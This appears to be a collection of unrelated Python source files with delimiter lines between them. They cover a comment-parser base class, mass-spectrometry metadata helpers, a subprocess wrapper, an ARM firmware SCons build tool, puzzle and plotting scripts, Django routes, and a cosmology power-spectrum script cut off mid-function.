raise NotImplementedError("Base LangSwitcher is Abstract.")
def isBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def isBlockCommentEnd(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def beforeBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def afterBlockCommentEnd(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the indicator for the start of a single line comment
def getSingleComment(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Clean a line of all single line comments with start + end designation
def cleanSingleLineBlockComment(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Clean a line of all single line comments
def cleanSingleLineComment(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Have we hit something that should never be in the function pattern? (maybe a ';')
def checkForFunctionReset(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Reset the function name after we have identified a scope change.
def resetFunctionName(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Remove the last piece of the function name from the rest of the name for further processing
def clearFunctionRemnants(self,line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Returns [NOT_CONTINUATION, CONTINUATION_START, CONTINUATION_END]
#depending on whether or not this line wraps to the next, is in the middle of such a state
#or at the end of one. Prior Status tells us if the previous line was a continuation line.
#Prior status is just a True/False Value.
def isContinuationLine(self, line, priorStatus):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Remove all strings from a line
def removeStrings(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
|
python
|
import logging
from typing import Any
from typing import List
from typing import Optional
from matchms.utils import filter_none
from matchms.utils import get_common_keys
from ..typing import SpectrumType
logger = logging.getLogger("matchms")
_retention_time_keys = ["retention_time", "retentiontime", "rt", "scan_start_time", "RT_Query"]
_retention_index_keys = ["retention_index", "retentionindex", "ri"]
def safe_store_value(spectrum: SpectrumType, value: Any, target_key: str) -> SpectrumType:
"""Helper function to safely store a value in the target key without throwing an exception, but storing 'None' instead.
Parameters
----------
spectrum
Spectrum to which to add 'value' in 'target_key'.
value
Value to parse into 'target_key'.
target_key
Name of the key in which to store the value.
Returns
-------
Spectrum with added key.
"""
if value is not None: # one of accepted keys is present
value = safe_convert_to_float(value)
spectrum.set(target_key, value)
return spectrum
def safe_convert_to_float(value: Any) -> Optional[float]:
"""Safely convert value to float. Return 'None' on failure.
Parameters
----------
value
Object to convert to float.
Returns
-------
Converted float value or 'None' if conversion is not possible.
"""
if isinstance(value, list) and len(value) == 1:
value = value[0]
try:
value = float(value)
rt = value if value >= 0 else None # discard negative RT values
except ValueError:
logger.warning("%s can't be converted to float.", str(value))
rt = None
return rt
def _add_retention(spectrum: SpectrumType, target_key: str, accepted_keys: List[str]) -> SpectrumType:
"""Add value from one of accepted keys to target key.
Parameters
----------
spectrum
Spectrum from which to read the values.
target_key
Key under which to store the value.
accepted_keys
List of accepted keys from which a value will be read (in order).
Returns
-------
Spectrum with value from first accepted key stored under target_key.
"""
common_keys = get_common_keys(spectrum.metadata.keys(), accepted_keys)
values_for_keys = filter_none([spectrum.get(key) for key in common_keys])
values = list(map(safe_convert_to_float, values_for_keys))
value = next(filter_none(values), None)
spectrum = safe_store_value(spectrum, value, target_key)
return spectrum
def add_retention_time(spectrum_in: SpectrumType) -> SpectrumType:
"""Add retention time information to the 'retention_time' key as float.
Negative values and those not convertible to a float result in 'retention_time'
being 'None'.
Parameters
----------
spectrum_in
Spectrum with retention time information.
Returns
-------
Spectrum with harmonized retention time information.
"""
if spectrum_in is None:
return None
spectrum = spectrum_in.clone()
target_key = "retention_time"
spectrum = _add_retention(spectrum, target_key, _retention_time_keys)
return spectrum
def add_retention_index(spectrum_in: SpectrumType) -> SpectrumType:
"""Add retention index into 'retention_index' key if present.
Parameters
----------
spectrum_in
Spectrum with RI information.
Returns
-------
Spectrum with RI info stored under 'retention_index'.
"""
if spectrum_in is None:
return None
spectrum = spectrum_in.clone()
target_key = "retention_index"
spectrum = _add_retention(spectrum, target_key, _retention_index_keys)
return spectrum
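# A hedged usage sketch (not part of the original module), assuming the standard
# matchms Spectrum constructor (mz, intensities, metadata):
if __name__ == "__main__":
    import numpy as np
    from matchms import Spectrum
    _spectrum = Spectrum(mz=np.array([100.0, 200.0]),
                         intensities=np.array([0.5, 1.0]),
                         metadata={"retentiontime": "12.5"})
    _spectrum = add_retention_time(_spectrum)
    print(_spectrum.get("retention_time"))  # 12.5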
|
python
|
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common functions."""
import subprocess
import sys
def error_and_exit(message):
"""Helper function to print errors and exit with sig 1."""
print('encryption_wrapper ERROR: {}'.format(message))
sys.exit(1)
def run_command(cmd, description):
"""Helper function to execute commands.
Args:
cmd: the command to execute
description: description of the command, for logging purposes
Returns:
returncode: the return code of the executed command
"""
try:
p = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
while True:
# print command output as it happens
line = p.stdout.readline()
if not line:
break
else:
print(str(line.strip(), 'utf-8'))
except subprocess.SubprocessError as command_exception:
error_and_exit('{} failed: {}'.format(description,
str(command_exception)))
# now communicate with the subprocess so the returncode property is set
p.communicate()
return p.returncode
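# A small usage sketch (hypothetical command, not part of the original module):
# stream a shell command's output and act on its exit status.
if __name__ == '__main__':
    rc = run_command('ls -l', 'directory listing')
    if rc != 0:
        error_and_exit('directory listing returned {}'.format(rc))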
|
python
|
#
# cortexm.py
#
#
# Copyright (c) 2013-2017 Western Digital Corporation or its affiliates.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
#     may be used to endorse or promote products derived from this software without
#     specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Author: Jeremy Garff <[email protected]>
#
# ARM Tools
import SCons
import os
import string
import struct
import array
import tarfile
def cortexm_flags(env):
gnu_tools = ['gcc', 'g++', 'gnulink', 'ar', 'gas']
for tool in gnu_tools:
env.Tool(tool) # This will ensure the normal Program, Object, etc.. work
cflags = '''
-D__EMBEDDED_STANDALONE__
-O0
-Wno-error=strict-aliasing
-mthumb
-Werror
-Wall
-g
-ffunction-sections
-fdata-sections
-fno-omit-frame-pointer
'''.split()
env['CFLAGS'] = cflags
env['CPPPATH' ] = [
'#/common',
]
env['CC'] = 'arm-none-eabi-gcc'
env['LINK'] = 'arm-none-eabi-gcc'
env['AR'] = 'arm-none-eabi-gcc-ar'
env['RANLIB'] = 'arm-none-eabi-gcc-ranlib'
env['OBJCOPY'] = 'arm-none-eabi-objcopy'
# Build a specially formed command line to include the libs
# given the quirks of gcc. ${LINKSCRIPT} must be defined for
# the appropriate environment (app, bootloader, etc.).
link = '''
--specs=nano.specs
-mthumb
-nostartfiles
-Wl,--relax
-Wl,--gc-sections
-T${LINKSCRIPT}
'''.split()
env.Append(
LINKFLAGS = link
)
# Verbose?
if not env['V']:
env.Append(
VERBOSE = "/dev/null",
CCCOMSTR = "CC ${TARGET}",
ARCOMSTR = "AR ${TARGET}",
RANLIBCOMSTR = "RANLIB ${TARGET}",
BINCOMSTR = "Bin ${TARGET}",
HEXCOMSTR = "Hex ${TARGET}",
ELFCOMSTR = "Elf ${TARGET}",
IMGCOMSTR = "Img ${TARGET}",
FWCOMSTR = "Firmware ${TARGET}",
UNTARCOMSTR = "UnTar ${SOURCE}",
BUILDCOMSTR = "Build ${TARGETS}",
APPLYCOMSTR = "Apply ${SOURCE}",
USERSIGCOMSTR= "Usersig ${SOURCE}",
SECTIONCOMSTR= "Sections ${TARGET}",
PDICOMSTR = "PDI ${TARGET}",
CGENCOMSTR = "CGEN ${TARGET}",
)
else:
env.Append(
VERBOSE = "/dev/stdout"
)
#
# Builder python functions
#
def cortexm_builders(env):
def tar_info_to_node(object):
return env.File(object.name)
#
# ROM Object C Code Builders
#
def create_csource_from_files(target, source, env):
def generate_cobject(pathname, data):
filename = pathname.split(os.sep)[-1];
cobj_name = filename.replace('.', '_')
objstr = "const uint8_t " + cobj_name + "[] =\n{\n "
j = 0
for i in data:
objstr = objstr + "0x%02x," % i
j = j + 1
if j > 15:
objstr = objstr + '\n '
j = 0
objstr = objstr + "\n};\n\n"
return filename, cobj_name, objstr, len(data)
def generate_cfile(target, source):
f = open(target[0].abspath, 'w')
f.write("/**** DO NOT EDIT **** Automatically Generated by cortexm.py */\n")
f.write("#include <stdint.h>\n")
f.write("#include <lwip/ip.h>\n")
f.write("#include <lwip/ip_addr.h>\n")
f.write("#include <lwip/netif.h>\n")
f.write("#include <lwip/tcpip.h>\n")
f.write('\n')
f.write('#include "http.h"\n')
# Create all of the individual objects
objs = []
for s in source:
source_data = [ord(x) for x in file(s.abspath).read()]
filename, cobjname, source_code, length = generate_cobject(s.abspath, source_data)
objs.append([ cobjname, filename, length ])
f.write(source_code)
# Create the master lookup table
f.write("const http_page_table_t http_pages[] =\n{\n");
for obj in objs:
f.write(" {\n")
f.write(' .name = "%s",\n' % obj[1])
f.write(" .object = %s,\n" % obj[0])
f.write(" .length = %s,\n" % obj[2])
f.write(" },\n");
f.write("};\n\n")
f.write("const uint32_t http_page_table_count = %d;\n\n" % len(objs))
f.close()
generate_cfile(target, source)
def tar_contents_emitter(target, source, env):
env.Depends(target, source)
try:
tar = tarfile.open(source[0].get_abspath(), 'r')
except IOError:
return target, source
contents = tar.getmembers()
tar.close()
files_only = filter(lambda entry: entry.isfile(), contents)
updated_targets = map(tar_info_to_node, files_only)
return updated_targets, source
def untar(target, source, env):
filename = source[0].get_abspath()
pathname = os.path.dirname(source[0].get_abspath())
tar = tarfile.open(filename, 'r')
tar.extractall(path = pathname)
tar.close()
return None
# CRC32, same algorithm used in ethernet, png, zip, etc..
def crc32(data):
crc_poly = 0xedb88320
crc = 0xffffffff
for d in data:
b = (crc & 0xff) ^ d
for r in range(8):
if (b & 1):
b = ( b >> 1) ^ crc_poly;
else:
b = (b >> 1)
crc = (crc >> 8) ^ b
return crc ^ 0xffffffff
def create_usersig(target, source, env):
data = [ord(x) for x in file(source[0].abspath, "rb").read()]
size = len(data)
crc = crc32(data)
usersig = [
# crc - little endian
crc & 0xff,
(crc >> 8) & 0xff,
(crc >> 16) & 0xff,
(crc >> 24) & 0xff,
# size - little endian
size & 0xff,
(size >> 8) & 0xff,
(size >> 16) & 0xff,
(size >> 24) & 0xff,
]
outdata = array.array('B', usersig)
outdata.tofile(file(target[0].abspath, "wb"))
# Create binary and usersig size header file
#
# source[0] : Application binary file
# source[1] : Usersig binary file
def create_section_header(target, source, env):
app_data = [ord(x) for x in file(source[0].abspath, 'rb').read()]
app_size = len(app_data)
usersig_data = [ord(x) for x in file(source[1].abspath, 'rb').read()]
usersig_size = len(usersig_data)
header = '/* ***** DO NOT MODIFY - Auto-generated by create_section_header **** */\n'
header = header + '#define APP_LEN ' + str(app_size) + '\n'
header = header + '#define USERSIG_LEN ' + str(usersig_size) + '\n'
file(target[0].abspath, 'wb').write(header)
def create_app_image(target, source, env):
def create_app_header(source, dest):
data = [ord(x) for x in file(source, "rb").read()]
size = len(data)
crc = crc32(data)
major, minor, micro = (0, 0, 0)
if 'VERSION' in env:
major, minor, micro = env['VERSION']
if env['V']:
print " Version : " + str(major) + "." + str(minor) + "." + str(micro)
print " Size : " + str(size)
print " CRC : " + hex(crc)
header = [ # See boot.h for struct definition
# magic
0x43, 0x89,
# flags
0, 0,
# crc - little endian
crc & 0xff, (crc >> 8) & 0xff,
(crc >> 16) & 0xff, (crc >> 24) & 0xff,
# size - little endian
size & 0xff, (size >> 8) & 0xff,
(size >> 16) & 0xff, (size >> 24) & 0xff,
# version
int(major), int(minor), int(micro), 0,
]
outdata = array.array("B", header + data)
outdata.tofile(file(dest, "wb"))
create_app_header(source[0].abspath, target[0].abspath)
# Combined image with bootloader and application
#
# Make sure to pad the bootloader size out to the full section (80k)
# See the .ld files to determine the proper size here
def create_full_binary(target, source, env, max_boot_size = 80 * 1024):
def pad_data(data, size):
padded = data + ([0] * (size - len(data)))
if len(padded) > size:
raise Exception("Boot section too large")
return padded
boot_data = pad_data([ord(x) for x in file(source[0].abspath, "rb").read()], max_boot_size)
app_data = [ord(x) for x in file(source[1].abspath, "rb").read()]
all_data = array.array('B', boot_data + app_data)
all_data.tofile(file(target[0].abspath, "wb"))
env.Append(BUILDERS = {
'Elf': SCons.Builder.Builder(
action = SCons.Action.Action("${LINK} -lc -lm ${LINKFLAGS} -Wl,--start-group ${SOURCES} -Wl,--end-group -o ${TARGET}", "${ELFCOMSTR}"),
suffix = '.elf'
),
'Hex' : SCons.Builder.Builder(
action = SCons.Action.Action("${OBJCOPY} -O ihex ${SOURCES} ${TARGET}", "${HEXCOMSTR}"),
suffix = '.hex'
),
'Bin' : SCons.Builder.Builder(
action = SCons.Action.Action("${OBJCOPY} -O binary ${SOURCES} ${TARGET}", "${BINCOMSTR}"),
suffix = '.bin'
),
'Usersig' : SCons.Builder.Builder(
action = SCons.Action.Action(create_usersig, "${USERSIGCOMSTR}"),
suffix = '.usersig'
),
'Firmware' : SCons.Builder.Builder(
action = SCons.Action.Action(create_app_image, "${FWCOMSTR}"),
suffix = ".fw"
),
'SectionHeader' : SCons.Builder.Builder(
action = SCons.Action.Action(create_section_header, "${SECTIONCOMSTR}"),
suffix = '.h'
),
'Image': SCons.Builder.Builder(
action = SCons.Action.Action(create_full_binary, "${IMGCOMSTR}"),
suffix = ".img"
),
'UnTar' : SCons.Builder.Builder(
action = SCons.Action.Action(untar, "${UNTARCOMSTR}"),
emitter = tar_contents_emitter # Update the ${TARGETS} to include all extracted files
),
'CGen' : SCons.Builder.Builder(
action = SCons.Action.Action(create_csource_from_files, "${CGENCOMSTR}"),
suffix = '.c',
),
})
#
# The following are required functions when using this via tools= in Environment()
#
def exists(env):
return True
def generate(env, **kwargs):
[ f(env) for f in (cortexm_flags, cortexm_builders) ]
|
python
|
# Advent of Code - Day 5 - Part One
from collections import defaultdict
def result(data):
points = defaultdict(int)
for line in data:
a, b = line.split(' -> ')
x1, y1 = a.split(',')
x2, y2 = b.split(',')
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
min_x, max_x = min(x1,x2), max(x1,x2)
min_y, max_y = min(y1, y2), max(y1,y2)
if min_x == max_x or min_y == max_y:
for x in range(min_x, max_x+1):
for y in range(min_y, max_y+1):
points[(x,y)] += 1
count = 0
for k in points.keys():
if points[k] > 1:
count += 1
return count
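# A small usage sketch (made-up input, not the puzzle data): a vertical and a
# horizontal segment that overlap only at (0, 1), so exactly one point counts.
if __name__ == '__main__':
    example = ['0,0 -> 0,2', '0,1 -> 2,1']
    print(result(example))  # 1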
|
python
|
# -*- coding: utf-8 -*-
"""Split Definition dataclass"""
from dataclasses import dataclass
from typing import Optional, List
from .rule import Rule
from .treatment import Treatment
from .environment import Environment
from .default_rule import DefaultRule
from .traffic_type import TrafficType
@dataclass
class SplitDefinition:
"""Split Definition model"""
treatments: List[Treatment]
defaultTreatment: str
defaultRule: List[DefaultRule]
name: Optional[str] = None
environment: Optional[Environment] = None
trafficType: Optional[TrafficType] = None
killed: Optional[bool] = None
baselineTreatment: Optional[str] = None
trafficAllocation: Optional[int] = None
rules: Optional[List[Rule]] = None
creationTime: Optional[int] = None
lastUpdateTime: Optional[int] = None
comment: Optional[str] = None
|
python
|
#!/usr/bin/env python
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Simulates a test model.
"""
import sys
import copy
import os
import optparse
from tema.model import getModelType,loadModel
def load_testdata(testdata_args):
module=__import__("tema.data.testdata",globals(),locals(),[""])
testdata=module.TestData()
# assuming that testdata_args are of form key:value,key2:value2,...
# see set_parameters function in testengine to do this properly
for key,value in [kv.split(":") for kv in testdata_args.split(",")]:
testdata.setParameter(key,value)
testdata.prepareForRun()
return testdata
def simulate(starting_state,testdata):
state=starting_state
stack=[]
action=""
while action!="q":
outtrans=state.getOutTransitions()
print ""
for i,t in enumerate(outtrans):
print "%3i: %30s -> %s" % (i+1,t.getAction(),t.getDestState())
action=raw_input("(%s) -> " % state)
try:
chosen=int(action)-1
if testdata:
stack.append((state,copy.deepcopy(testdata._runtimedata.namespace)))
else:
stack.append(state)
state=outtrans[chosen].getDestState()
if testdata:
try: paction=testdata.processAction(str(outtrans[chosen].getAction()))
except Exception, e:
print "error in execution:",e
else: print "executed: '%s'" % paction
except:
if action=="b":
if stack:
if testdata:
state,testdata._runtimedata.namespace=stack.pop()
else:
state=stack.pop()
else: print "Already in the initial state"
elif action=="i": state=starting_state
def readArgs():
usagemessage = "usage: %prog [filename] [options]"
description = "If no filename is given or filename is -, reads from standard input"
parser = optparse.OptionParser(usage=usagemessage,description=description)
parser.add_option("-f", "--format", action="store", type="str",
help="Format of the model file")
parser.add_option("--testdata", action="store", type="str",
help="Testdata for model")
options, args = parser.parse_args(sys.argv[1:])
if len(args) == 0:
modelfile = "-"
elif len(args) == 1:
modelfile = args[0]
else:
parser.error("More than one filename given")
if not options.format and modelfile == "-":
parser.error("Reading from standard input requires format parameter")
return modelfile,options
def main():
modelfile,options=readArgs()
if options.testdata:
testdata=load_testdata(options.testdata)
else:
testdata=None
try:
modeltype=options.format
if not modeltype:
modeltype = getModelType(modelfile)
if not modeltype:
print >>sys.stderr, "%s: Error. Unknown model type. Specify model type using '-f'" % os.path.basename(sys.argv[0])
sys.exit(1)
if modelfile == "-":
file_object=sys.stdin
else:
file_object=open(modelfile)
m=loadModel(modeltype,file_object)
except Exception, e:
print >>sys.stderr,e
sys.exit(1)
simulate(m.getInitialState(),testdata)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
sys.exit(1)
|
python
|
import serial
import struct
s = serial.Serial('/dev/cu.usbserial-A600e0ti', baudrate=19200)
def receive_msg():
print 'Receiving messages'
message = []
c = s.read()
while c != '\n':
message.append(c)
c = s.read()
message = ''.join(message)
print 'Msg:', message
|
python
|
from django.conf.urls import url
from app05plus.views import index, register, mylogin
from app05plus.views import mylogout
urlpatterns = [
url(r"^newindex01$",index),
url(r"^register01$",register,name="register"),
url(r"^mylogin01$",mylogin,name="mylogin"),
url(r"^logout$",mylogout),
]
|
python
|
import astropy.units as u
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.animation import FuncAnimation
from einsteinpy.metric import Schwarzschild
class ScatterGeodesicPlotter:
"""
Class for producing matplotlib scatter plots of geodesics, both static and animated.
"""
def __init__(
self, mass, time=0 * u.s, attractor_color="black", cmap_color="Oranges"
):
"""
Parameters
----------
mass : ~astropy.units.Quantity
Mass of the attractor.
time : ~astropy.units.Quantity, optional
Time of start. Defaults to 0 seconds.
attractor_color : string, optional
Color which is used to denote the attractor. Defaults to black.
cmap_color : string, optional
Color used in function plot.
"""
self.mass = mass
self.time = time
self._attractor_present = False
self.attractor_color = attractor_color
self.cmap_color = cmap_color
def _plot_attractor(self):
self._attractor_present = True
plt.scatter(0, 0, color=self.attractor_color)
def plot(self, coords, end_lambda=10, step_size=1e-3):
"""
Parameters
----------
coords : ~einsteinpy.coordinates.velocity.SphericalDifferential
Position and velocity components of particle in Spherical Coordinates.
end_lambda : float, optional
Lambda where iterations will stop.
step_size : float, optional
Step size for the ODE.
"""
swc = Schwarzschild.from_spherical(coords, self.mass, self.time)
vals = swc.calculate_trajectory(
end_lambda=end_lambda, OdeMethodKwargs={"stepsize": step_size}
)[1]
time = vals[:, 0]
r = vals[:, 1]
# Currently not being used (might be useful in future)
# theta = vals[:, 2]
phi = vals[:, 3]
pos_x = r * np.cos(phi)
pos_y = r * np.sin(phi)
plt.scatter(pos_x, pos_y, s=1, c=time, cmap=self.cmap_color)
if not self._attractor_present:
self._plot_attractor()
def animate(self, coords, end_lambda=10, step_size=1e-3, interval=50):
"""
Function to generate animated plots of geodesics.
Parameters
----------
coords : ~einsteinpy.coordinates.velocity.SphericalDifferential
Position and velocity components of particle in Spherical Coordinates.
end_lambda : float, optional
            Lambda where iterations will stop.
step_size : float, optional
Step size for the ODE.
interval : int, optional
Control the time between frames. Add time in milliseconds.
"""
swc = Schwarzschild.from_spherical(coords, self.mass, self.time)
vals = swc.calculate_trajectory(
end_lambda=end_lambda, OdeMethodKwargs={"stepsize": step_size}
)[1]
time = vals[:, 0]
r = vals[:, 1]
# Currently not being used (might be useful in future)
# theta = vals[:, 2]
phi = vals[:, 3]
pos_x = r * np.cos(phi)
pos_y = r * np.sin(phi)
frames = pos_x.shape[0]
x_max, x_min = max(pos_x), min(pos_x)
y_max, y_min = max(pos_y), min(pos_y)
margin_x = (x_max - x_min) * 0.1
margin_y = (y_max - y_min) * 0.1
fig = plt.figure()
plt.xlim(x_min - margin_x, x_max + margin_x)
plt.ylim(y_min - margin_y, y_max + margin_y)
pic = plt.scatter([], [], s=1, c=[])
plt.scatter(0, 0, color="black")
def _update(frame):
pic.set_offsets(np.vstack((pos_x[: frame + 1], pos_y[: frame + 1])).T)
pic.set_array(time[: frame + 1])
return (pic,)
self.animated = FuncAnimation(fig, _update, frames=frames, interval=interval)
def show(self):
plt.show()
def save(self, name="scatter_geodesic.png"):
plt.savefig(name)
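# --- Illustrative usage sketch (not part of the original module) ---
# Assumes `coords` is an already-constructed
# einsteinpy.coordinates.velocity.SphericalDifferential instance, as expected by
# plot()/animate() above; its exact constructor signature is not shown here.
#
#     import astropy.units as u
#     plotter = ScatterGeodesicPlotter(mass=4e30 * u.kg)
#     plotter.plot(coords, end_lambda=0.002, step_size=5e-8)
#     plotter.show()
#     plotter.save("my_geodesic.png")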
|
python
|
import os, sys
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import scipy.signal
import scipy.special
import scipy.interpolate
from classy import Class
from helper import cache_grendel, cropsave, grendel_dir
"""
For just one of the boxes, plot the absolute CONCEPT
and GADGET spectra over time, including a = a_begin.
"""
textwidth = 504 # mnras: 240 (single-column), 504 (both columns)
width = textwidth/72.27
height = 4.185
# The general font size is 9 but in captions it is 8.
# We choose to match this exactly.
fontsize = 8 #9/1.2
latex_preamble = r'''
\usepackage{lmodern}
\usepackage{amsmath}
\usepackage{amsfonts}
\usepackage{mathtools}
\usepackage{siunitx}
\usepackage{xfrac}
\usepackage{nicefrac}
\usepackage{relsize}
\newcommand{\CONCEPT}{\textsc{co\textsl{n}cept}}
\newcommand{\CONCEPTONE}{\textsc{co\textsl{n}cept}\,\textscale{.77}{{1.0}}}
\newcommand{\GADGETTWO}{\textsc{gadget}-\textscale{.77}{{2}}}
'''
matplotlib.rcParams.update({
'text.usetex' : True,
'font.family' : 'serif',
'font.serif' : 'cmr10',
'font.size' : fontsize,
'mathtext.fontset' : 'cm',
'axes.formatter.use_mathtext': True,
'text.latex.preamble': latex_preamble,
})
h = 0.67
size = 1024
N = size**3
z_values = [10, 5, 3, 2, 1, 0.5, 0]
a_values = [1/(1 + z) for z in z_values]
boxsizes = [512]
boxsize = boxsizes[0]
nprocs = {2048: 256, 1024: 256, 512: 256, 256: 1024}
concept_standard = ['', 'final', 'symplectic_final'][2]
gadget_standard = ['', ][0]
textwidth = 240 # mnras: 240 (single-column), 504 (both columns)
width = textwidth/72.27
height = 2.09
fig = plt.figure(figsize=(width, height))
n_axis = 6
gs = fig.add_gridspec(n_axis, 1)
ax1 = fig.add_subplot(gs[:(n_axis - 1), 0])
ax2 = fig.add_subplot(gs[n_axis - 1, 0])
axes = [ax1, ax2]
# Load
cache_assume_uptodate = True
output_dir = f'{grendel_dir}/powerspec/concept_vs_gadget'
def load_concept(boxsize, special=''):
directory = f'{output_dir}/nprocs{nprocs[boxsize]}/{boxsize}/{special}'.rstrip('/')
P = []
k = None
for a in a_values:
filename = f'{directory}/powerspec_a={a:.2f}'
if cache_assume_uptodate:
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
else:
if not os.path.isfile(filename):
continue
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k, _P = np.loadtxt(filename, usecols=(0, 2), unpack=True)
P.append(_P)
return k, P
def load_gadget_power(box, special=''):
directory = f'{output_dir}/Gadget2/box{box}_size{size}/{special}'.rstrip('/')
P = []
k = None
for i, a in enumerate(a_values):
filename = f'{directory}/powerspec_snapshot_00{i}'
if cache_assume_uptodate:
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
else:
if not os.path.isfile(filename):
continue
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k, _P = np.loadtxt(filename, usecols=(0, 2), unpack=True)
P.append(_P)
return k, P
k_all = {}
P_concept = {}
P_gadget = {}
for boxsize in boxsizes:
k_all[boxsize], P_concept[boxsize] = load_concept(boxsize, concept_standard)
_, P_gadget[boxsize] = load_gadget_power(boxsize, gadget_standard)
def get_mask(k, k_nyq):
mask = (k < k_nyq)
for i, el in enumerate(reversed(mask)):
if el:
mask[i-3:] = False
break
return mask
def k_nyq_particles(boxsize):
"""Supply box in [Mpc/h] to get k_Nyquist in [1/Mpc]
"""
return 2*np.pi/boxsize*(np.cbrt(N)/2)*h
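# Worked example with the values used in this script (boxsize = 512 Mpc/h,
# N = 1024**3, h = 0.67): cbrt(N)/2 = 512, so
# k_nyq = 2*pi/512 * 512 * 0.67 = 2*pi*0.67 ≈ 4.21 / Mpc.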
def smooth(x, y, n=500, num=40):
fac = np.log(1024)/np.log(2048)
num *= fac
num = int(round(num))
if num%2 == 0:
num += 1
x_interp = np.logspace(np.log10(x[0]), np.log10(x[-1]), n)
y_interp = np.interp(np.log10(x_interp), np.log10(x), y)
y_smoothed = scipy.signal.savgol_filter(y_interp, num, 2)
#steepness = 2
#k_smooth = 0.4*np.sqrt(x[0]*x[-1])
#weight = (1 - scipy.special.erf(steepness*np.log10(x_interp/k_smooth)))/2
#y_smoothed = weight*y_interp + (1 - weight)*y_smoothed
return x_interp, y_smoothed
# Also load initial power spectrum
filename = f'{grendel_dir}/powerspec/box512_size1024/powerspec_a=0.01'
filename = cache_grendel(filename, cache_assume_uptodate=cache_assume_uptodate)
k_ini, P_ini = np.loadtxt(filename, usecols=(0, 2), unpack=True)
k = k_all[boxsize]
if not np.all(k_ini == k):
print('Mismatch between initial and sim k!', file=sys.stderr)
a_begin = 0.01
z_values_all = [int(round(1/a_begin - 1))] + z_values
def get_class(boxsize):
k = k_all[boxsize]
cosmo = Class()
Omega_b = 0.049
Omega_cdm = 0.27
params = {
'Omega_b': Omega_b,
'Omega_cdm': Omega_cdm,
'H0': 67.0,
'P_k_max_1/Mpc': np.max(k)*1.01,
'output': 'dTk mPk',
'z_pk': ', '.join([str(float(z)) for z in z_values_all]),
}
cosmo.set(params)
cosmo.compute()
P_class = [np.array([cosmo.pk(ki, z) for ki in k]) for z in z_values_all]
# Scale according to D(a) with and without radiation
bg = cosmo.get_background()
a_bg = 1/(1 + bg['z'])
a_min = 1e-6
mask = (a_bg >= a_min)
a_bg = a_bg[mask]
D_class = bg['gr.fac. D'][mask]
Omega_m = Omega_b + Omega_cdm
Omega_Lambda = 1 - Omega_m
D_concept = a_bg*scipy.special.hyp2f1(1/3, 1, 11/6, -Omega_Lambda/Omega_m*a_bg**3)
D_concept /= D_concept[-1]
